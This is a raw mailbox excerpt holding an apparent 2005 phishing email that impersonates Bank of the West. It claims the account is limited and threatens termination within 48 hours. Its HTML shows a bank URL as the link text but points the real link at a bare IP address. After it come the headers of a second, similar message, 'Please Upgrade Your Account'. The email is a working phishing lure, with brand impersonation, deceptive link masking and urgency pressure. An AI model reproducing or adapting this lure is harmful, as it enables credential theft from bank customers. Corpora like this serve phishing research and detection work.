From: "Bank Of The West Security Department" <support@bankofthewest.com>
Reply-To: "Bank Of The West Security Department" <security@bankofthewest.com>
To: jose@monkey.org
Subject: Confirm your Online Banking records
Date: Fri, 22 Jul 2005 05:15:35 +0400
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--4702752107848305098"
X-Priority: 1
X-MSMail-Priority: High
Content-Length: 3241
Lines: 47
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 136

----4702752107848305098
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>=0A=0A<head>=0A<meta http-equiv=3D"Content-Language" content=3D"en-u=
s">=0A<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwi=
ndows-1252">=0A<title> Notification of Limited Account Access</title>=0A</=
head>=0A=0A<body>=0A=0A<p align=3D"center">=0A<img border=3D"0" src=3D"htt=
p://www.bankofthewest.com/BOW/assets/vcmStaticContent/images/logo.gif" wid=
th=3D"340" height=3D"24"></p>=0A<p align=3D"justify"><font face=3D"TimesNe=
wRoman" size=3D"4">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp; =0A Notification of Limited Account Access</font><=
/p>=0A<p align=3D"justify">&nbsp;</p>=0A<div align=3D"center">=0A	<table b=
order=3D"0" width=3D"59%" id=3D"table1">=0A		<tr>=0A			<td>=0A			<p align=3D=
"justify"><font face=3D"Arial" size=3D"1">As part of our security measures=
, we regularly screen activity in the=0Abanking system.=0AWe recently noti=
ced the following issue on your account:<br><br>=0A=0AWe would like to ens=
ure that your account was not accessed by an=0Aunauthorized third party. B=
ecause protecting the security of your account=0Ais our primary concern, w=
e have limited access to sensitive account=0Afeatures. We understand that =
this may be an inconvenience but please=0Aunderstand that this temporary l=
imitation is for your protection.<br><br>=0A=0ACase ID Number: PP-090-292-=
753<br><br>=0A=0A=0AFor your protection, we have limited access to your ac=
count until=0Aadditional security measures can be completed. We apologize =
for any=0Ainconvenience this may cause.<br><br>=0A=0ATo review your accoun=
t and some or all of the information that Bank of the West used=0Ato make =
its decision to limit your account access, please visit the link below:</f=
ont></p>=0A			<p align=3D"justify"><font face=3D"Arial" size=3D"1"><a href=
=3D"http://62.193.220.69/www.bankofthewest.com/secure/confirm_files/">=0A	=
		http://www.bankofthewest.com/BOW/PP090292753form.htm</a>&nbsp; </font></=
p>=0A                        <p align=3D"justify"><font face=3D"Arial" siz=
e=3D"1">If, after reviewing your account information, you seek=0Afurther c=
larification regarding your account access, please contact Bank of the Wes=
t=0Aby visiting the Help Center and clicking "Contact Us". If after 48 hou=
rs your information is not submitted your account will be terminated.=0AWe=
 thank you for your prompt attention to this matter. Please understand=0At=
hat this is a security measure intended to help protect you and your=0Aacc=
ount. We apologize for any inconvenience.<br><br>=0A=0ASincerely,<br><br>=0A=
Bank of the West Account Review Department<br><br>=0A=0A=0AEmail ID PP522<=
br><br>=0APlease do not reply to this email. This mailbox is not monitored=
 and you will not receive a response. =0A					</tr>=0A	</table>=0A</div>=0A=
<p align=3D"justify">&nbsp;</p>=0A</font></p>=0A=0A</body>=0A=0A</html>=0A

----4702752107848305098--

From root@localhost.localdomain  Sat Jul 23 13:40:15 2005
Return-Path: <root@localhost.localdomain>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 9112E536E8C
	for <jose@login.monkey.org>; Sat, 23 Jul 2005 13:40:14 -0400 (EDT)
Received: from localhost.localdomain (unknown [211.250.165.6])
	by mail2.monkey.org (Postfix) with ESMTP id C0C111836AC
	for <jose@monkey.org>; Sat, 23 Jul 2005 13:40:13 -0400 (EDT)
Received: from localhost.localdomain (netfile [127.0.0.1])
	by localhost.localdomain (8.12.10/8.12.10) with ESMTP id j6NHUVIE013226
	for <jose@monkey.org>; Sun, 24 Jul 2005 02:30:31 +0900
Received: (from root@localhost)
	by localhost.localdomain (8.12.10/8.12.10/Submit) id j6NHUVRM013224
	for jose@monkey.org; Sun, 24 Jul 2005 02:30:31 +0900
Date: Sun, 24 Jul 2005 02:30:31 +0900
To: jose@monkey.org
Subject: Please Upgrade Your Account
Message-ID: <1122139831.3985.qmail@bankofthewest.com>
